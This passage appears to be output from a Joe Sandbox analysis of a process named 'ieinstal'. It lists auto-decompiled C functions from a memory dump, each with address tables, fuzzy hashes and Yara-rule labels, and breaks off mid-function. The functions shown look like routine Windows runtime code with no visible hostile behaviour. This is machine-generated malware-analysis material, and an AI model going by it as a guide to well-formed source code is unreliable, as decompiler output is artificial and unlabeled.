                        0x1edcfe84
                        0x1edcfe84
                        0x1edcfe93
                        0x00000000
                        0x1edcfea8
                        0x1edcfeba
                        0x00000000
                        0x1edcfeba
                        0x1edcfdfe
                        0x1edcfe01
                        0x1edcfe02
                        0x1edcfe08
                        0x1edcff0c
                        0x1edcff14
                        0x1edcff14

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 99a7335c0f0fd205e67fdc209aa862e192c4f55a95aee7ddf89650ea80ef5673
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: D9310836700680AFD3128765C854F9B7BEAEFC5690F14469DE9858B382DB74EC81C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDCEA55, Relevance: .1, Instructions: 111COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E1EDCEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E1ED22280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E1EDCE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E1ED0F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E1ED1FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E1EDCAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E1EDCBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E1ED27D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E1EDBFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E1ED1FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E1EDCA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                        0x1edcea55
                        0x1edcea66
                        0x1edcea68
                        0x1edcea6c
                        0x1edcea6f
                        0x1edcea72
                        0x1edcea75
                        0x1edcea7a
                        0x1edcea7a
                        0x1edcea7e
                        0x1edcea80
                        0x1edcea85
                        0x1edcea8b
                        0x1edceab5
                        0x1edceabc
                        0x1edceabf
                        0x1edceabf
                        0x1edceaca
                        0x1edceace
                        0x1edcead0
                        0x1edceae4
                        0x1edceaeb
                        0x1edceaf0
                        0x1edceaf5
                        0x1edceb09
                        0x1edceb0d
                        0x1edceb1d
                        0x1edceb2d
                        0x1edceb38
                        0x1edceb3d
                        0x1edceb41
                        0x1edceb4a
                        0x1edceb60
                        0x1edceb4c
                        0x1edceb52
                        0x1edceb59
                        0x1edceb59
                        0x1edceb68
                        0x1edceb71
                        0x1edceb71
                        0x1edcea8d
                        0x1edcea8f
                        0x1edcea92
                        0x1edcea97
                        0x1edcea97
                        0x1edcea9b
                        0x1edcea9c
                        0x1edcea9e
                        0x1edceaa6
                        0x1edceaa6
                        0x1edceb7e

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 5b09cd355b37ad4f6322a42f81c9614cfd6f37339ced93667f59a66d4785426b
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 6F3181766147469FC719CF24C880A6BB7AAFFC4250F044A2EF95687684DB31E809CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED869A6, Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E1ED869A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1edfd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L1ED16C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E1ED86BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E1ED49980() >= 0) {
							E1ED22280(_t56, 0x1edf8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1edf8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1edf8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E1ED0B6F0(0x1ecec338, 0x1ecec288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E1ED49520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E1ED495D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E1ED1FFB0(_t68, _t77, 0x1edf8778);
				}
				_pop(_t78);
				return E1ED4B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                        0x1ed869b5
                        0x1ed869be
                        0x1ed869c3
                        0x1ed869c9
                        0x1ed869cc
                        0x1ed869d1
                        0x1ed869d3
                        0x1ed869de
                        0x1ed869e1
                        0x1ed869ea
                        0x1ed869f6
                        0x1ed869fe
                        0x1ed86a13
                        0x1ed86a14
                        0x1ed86a15
                        0x1ed86a16
                        0x1ed86a1e
                        0x1ed86a26
                        0x1ed86a31
                        0x1ed86a36
                        0x1ed86a37
                        0x1ed86a40
                        0x1ed86a49
                        0x1ed86a4a
                        0x1ed86a53
                        0x1ed86a59
                        0x1ed86a5d
                        0x1ed86a5e
                        0x1ed86a64
                        0x1ed86a67
                        0x1ed86a6a
                        0x1ed86a6d
                        0x1ed86a70
                        0x1ed86a77
                        0x1ed86a7d
                        0x1ed86a86
                        0x1ed86a89
                        0x1ed86a9c
                        0x1ed86a9f
                        0x1ed86aa2
                        0x1ed86aa5
                        0x1ed86aaf
                        0x1ed86ab1
                        0x1ed86ab8
                        0x1ed86ab9
                        0x1ed86abb
                        0x1ed86abe
                        0x1ed86ac5
                        0x1ed86ac5
                        0x1ed86aaf
                        0x1ed86a40
                        0x1ed86a26
                        0x1ed869fe
                        0x1ed86ace
                        0x1ed86ad0
                        0x1ed86ad3
                        0x1ed86ad8
                        0x1ed86adf
                        0x1ed86adf
                        0x1ed86ae8
                        0x1ed86aef
                        0x1ed86aef
                        0x1ed86af9
                        0x1ed86b06

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 080b6066d76331b9ba42d7f86a75b40cf05d0c4f0669900cc0d3fab93d27104a
                        • Instruction ID: 972fc8e6ce12cfed538d380f59734e822f817fc32dac556efc44b193e3793c6f
                        • Opcode Fuzzy Hash: 080b6066d76331b9ba42d7f86a75b40cf05d0c4f0669900cc0d3fab93d27104a
                        • Instruction Fuzzy Hash: BC41A2B5D00248AFDB14CFA5D940BFEFBF5EF48314F14862AE925A7240DB70A906CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED05210, Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E1ED05210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E1ED052A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1ED495D0();
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E1ED1EB70(_t54, 0x1edf79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E1ED495D0();
								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E1ED1EB70(_t54, 0x1edf79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E1ED4F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E1ED1EB70(_t54, 0x1edf79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E1ED495D0();
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                        0x1ed05220
                        0x1ed05224
                        0x1ed60d13
                        0x1ed60d16
                        0x1ed60d19
                        0x1ed0522a
                        0x1ed0522a
                        0x1ed0522d
                        0x1ed0522d
                        0x1ed05231
                        0x1ed05235
                        0x1ed05239
                        0x1ed60d5c
                        0x1ed60d62
                        0x00000000
                        0x00000000
                        0x1ed60d6a
                        0x1ed60d7b
                        0x1ed60d7f
                        0x1ed60d81
                        0x1ed60d84
                        0x1ed60d95
                        0x1ed60d95
                        0x1ed60d6c
                        0x1ed60d71
                        0x1ed60d71
                        0x1ed60d9a
                        0x00000000
                        0x1ed0524a
                        0x1ed0524a
                        0x1ed05250
                        0x1ed60d24
                        0x1ed60d35
                        0x1ed60d39
                        0x1ed60d3b
                        0x1ed60d3e
                        0x1ed60d50
                        0x1ed60d50
                        0x1ed60d26
                        0x1ed60d2b
                        0x1ed60d2b
                        0x00000000
                        0x1ed60d55
                        0x1ed05256
                        0x1ed0525b
                        0x1ed05265
                        0x1ed60da7
                        0x1ed0526b
                        0x1ed0526e
                        0x1ed05272
                        0x1ed60db1
                        0x1ed60db4
                        0x1ed60dc5
                        0x1ed60dc5
                        0x1ed05272
                        0x1ed05278
                        0x1ed0527e
                        0x1ed0528a
                        0x1ed0528c
                        0x1ed0528d
                        0x00000000
                        0x1ed05280
                        0x1ed05282
                        0x1ed05288
                        0x1ed0529f
                        0x1ed05292
                        0x00000000
                        0x1ed05292
                        0x00000000
                        0x1ed05288
                        0x1ed0527e

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f0b78165f53bd4a5b969d2fa269c4b9d1cde25eba5df68b6b6907a6ae04a1ad6
                        • Instruction ID: 4ad45ec8471b3aeea0e3be749b6f34adc3fc6aa0fc72100ed3ff3310e497f1d2
                        • Opcode Fuzzy Hash: f0b78165f53bd4a5b969d2fa269c4b9d1cde25eba5df68b6b6907a6ae04a1ad6
                        • Instruction Fuzzy Hash: 05310831511652EBC7328B69CD40B567776FF14760F564B2AE8554B9E0D770F800CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3A61C, Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E1ED3A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1ede0220);
				E1ED5D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1edf7b9c; // 0x0
				_t55 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E1ED5D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1edf7b10 =  *0x1edf7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x1edf536c; // 0x3026338
					if( *_t51 != 0x1edf5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1edf5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x1edf536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E1ED3A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                        0x1ed3a61c
                        0x1ed3a61e
                        0x1ed3a623
                        0x1ed3a628
                        0x1ed3a62b
                        0x1ed3a62d
                        0x1ed3a648
                        0x1ed3a64a
                        0x1ed3a64f
                        0x1ed79b44
                        0x1ed3a6ec
                        0x1ed3a6f1
                        0x1ed3a6f1
                        0x1ed3a655
                        0x1ed3a657
                        0x1ed3a65a
                        0x1ed3a65d
                        0x1ed3a662
                        0x1ed3a663
                        0x1ed3a667
                        0x1ed3a668
                        0x1ed3a66d
                        0x1ed3a706
                        0x1ed3a706
                        0x1ed79bda
                        0x1ed79be6
                        0x1ed79beb
                        0x00000000
                        0x1ed79beb
                        0x1ed3a679
                        0x1ed79b7a
                        0x00000000
                        0x1ed79b7a
                        0x1ed3a683
                        0x1ed3a6f4
                        0x1ed3a6f7
                        0x1ed3a6f9
                        0x1ed3a6fd
                        0x1ed3a6a0
                        0x1ed3a6a0
                        0x1ed3a6ad
                        0x1ed3a6af
                        0x1ed3a6b4
                        0x1ed79ba7
                        0x1ed79bac
                        0x00000000
                        0x00000000
                        0x1ed79bc6
                        0x1ed79bce
                        0x1ed79bd1
                        0x1ed79bd3
                        0x1ed79bd3
                        0x00000000
                        0x1ed79bd1
                        0x1ed3a6bd
                        0x1ed3a6c3
                        0x1ed3a6c6
                        0x1ed3a6d2
                        0x1ed3a701
                        0x1ed3a704
                        0x00000000
                        0x1ed3a704
                        0x1ed3a6d4
                        0x1ed3a6d6
                        0x1ed3a6d9
                        0x1ed3a6db
                        0x1ed3a6e1
                        0x1ed3a6e6
                        0x1ed3a6e8
                        0x1ed3a6e8
                        0x1ed3a6ea
                        0x00000000
                        0x1ed3a6ea
                        0x1ed3a688
                        0x1ed3a692
                        0x1ed3a694
                        0x1ed3a699
                        0x00000000
                        0x00000000
                        0x1ed3a69d
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa29d01363c6034563c4b825c4b9505f62fb47a42bc1495593e49249bac86d11
                        • Instruction ID: 61d423d2363920633ce16aec1052641582e084d7bf6f3295ed6d3a70f25f8611
                        • Opcode Fuzzy Hash: aa29d01363c6034563c4b825c4b9505f62fb47a42bc1495593e49249bac86d11
                        • Instruction Fuzzy Hash: 1A414BB5E10255DFCB05CF59C990B99BBF2BF49305F2A8269E808AB344D774AD42CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED43D43, Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED43D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E1ED17B60(0, _t61, 0x1ece11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E1ED17B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L1ED24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                        0x1ed43d4c
                        0x1ed43d50
                        0x1ed43d55
                        0x1ed43d5e
                        0x1ed7e79a
                        0x00000000
                        0x1ed7e79a
                        0x1ed43d68
                        0x1ed7e789
                        0x1ed43d9d
                        0x1ed43da3
                        0x1ed43daf
                        0x1ed43db5
                        0x1ed43dbc
                        0x1ed43dc4
                        0x1ed43dc9
                        0x1ed43dce
                        0x1ed7e7ae
                        0x1ed7e7ae
                        0x1ed43dde
                        0x1ed43de2
                        0x1ed43de7
                        0x1ed43e0d
                        0x1ed43e13
                        0x1ed43e16
                        0x1ed43e1e
                        0x1ed43e25
                        0x1ed43e28
                        0x00000000
                        0x00000000
                        0x1ed43e2a
                        0x1ed43e2f
                        0x1ed43e37
                        0x1ed43e37
                        0x00000000
                        0x1ed43e37
                        0x1ed43e31
                        0x00000000
                        0x1ed43e31
                        0x1ed43e20
                        0x1ed43e20
                        0x1ed43e35
                        0x00000000
                        0x1ed43de9
                        0x1ed43de9
                        0x1ed43de9
                        0x1ed43dee
                        0x1ed43dfd
                        0x1ed43dff
                        0x1ed43e02
                        0x1ed43e05
                        0x1ed43e05
                        0x00000000
                        0x1ed43df0
                        0x1ed43de7
                        0x1ed7e78f
                        0x1ed7e794
                        0x1ed43d79
                        0x1ed43d84
                        0x1ed43d89
                        0x1ed43d8e
                        0x00000000
                        0x1ed7e7a4
                        0x1ed43d96
                        0x1ed43d9a
                        0x00000000
                        0x1ed43d9a
                        0x00000000
                        0x1ed7e794
                        0x1ed43d6e
                        0x1ed43d73
                        0x00000000
                        0x1ed7e7b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 539d1700c87a18fbfdeab17cde4f86092904adb4b9317b15f2e8d98aa9f91ba1
                        • Instruction ID: eed80b81811007a56cf00df5a81fb9b4247abf08d90b58ab00515ab23d7cc59b
                        • Opcode Fuzzy Hash: 539d1700c87a18fbfdeab17cde4f86092904adb4b9317b15f2e8d98aa9f91ba1
                        • Instruction Fuzzy Hash: BA31D431A01655DBC724DF2ED841A6BBBF2EF65700725827EE885CBB50EB30D840C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED87016, Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E1ED87016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1edfd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E1ED86B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E1ED86B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E1ED27D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E1ED49AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E1ED4B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
